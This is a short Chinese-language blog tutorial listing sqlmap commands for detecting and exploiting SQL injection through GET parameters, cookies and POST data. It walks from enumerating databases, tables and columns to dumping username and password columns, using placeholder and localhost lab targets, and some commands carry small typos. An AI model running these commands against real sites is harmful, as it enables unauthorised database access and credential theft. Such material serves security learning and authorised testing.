sqlmap的注入使用常用命令

SQLmap的注入使用

sqlmap的注入使用常用命令

SQLmap是一款强大的注入工具,相比经典的啊D和明小子之类的注入工具,SQLmap功能更加强大,无论是自带字典,功能还是界面优化,都是一款非常不错的注入工具,sqlmap可以多平台 运行,windows,linux下都可以进行access,mysql,mssql等数据库的注入 ,更重要的是sqlmap是一款开源的工具

注入命令详解:

找到sqlmap路径,在CMD里面输入CD CC路径进入到SQLMAP路径目录下,然后输入python sqlmap.py -u"xxxxxxxxx"

sqlmap语句含义:
三种注入判断方式:

  1. python sqlmap.py -u “xxxxxx.com” [查询链接是否存在get注入漏洞以及返现目标基本信息]
  2. python sqlmap.py -u “xxxxxx.com” --cookie “id=xx” --level 2 [判断url是否存在cookie注入]
  3. python sqlmap.py -u “xxxxxx.com” --data “xx=xx&xx=xx” [判断url是否存在post注入]

get注入详解

python sqlmap.py -u “xxxxxx.com” --dbs [获取数据库内所有数据库名称]
python sqlmap.py -u “xxxxxx.com” --current-db [查看目标网站所存在的数据库名称]
python sqlmap.py -u “xxxxxx.com” -D XX --tables [获取XX数据库内的表信息]
python sqlmap.py -u “xxxxxx.com” D XX [数据库名] -T XX [表名] --columns [获取表内列的信息]
python sqlmap.py -u “xxxxxx.com” D XX -T XX -C XX,XX[列名] --dump [获取列内信息]

cookie注入详解

sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie “id=27” --level 2 //判断是否村内在cookie注入
sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie “id=27” --level 2 --tables//猜解admin表下的列名
sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie “id=27” --level 2 --dump -C “usename,password” -T admin//获取指定列名admin下的数据

post注入详解

sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” //判断注入
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” --tables//猜解表明
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” --tables -D “security”//猜解security数据库下的表名
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” --columns -T “user” //猜解security数据库下的表名user中的列名
sqlmap.py -u http://127.0.0.1:88/p.php–data “u=admin&p=123456” --dump -C “isername,password” -T user //猜解数据

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值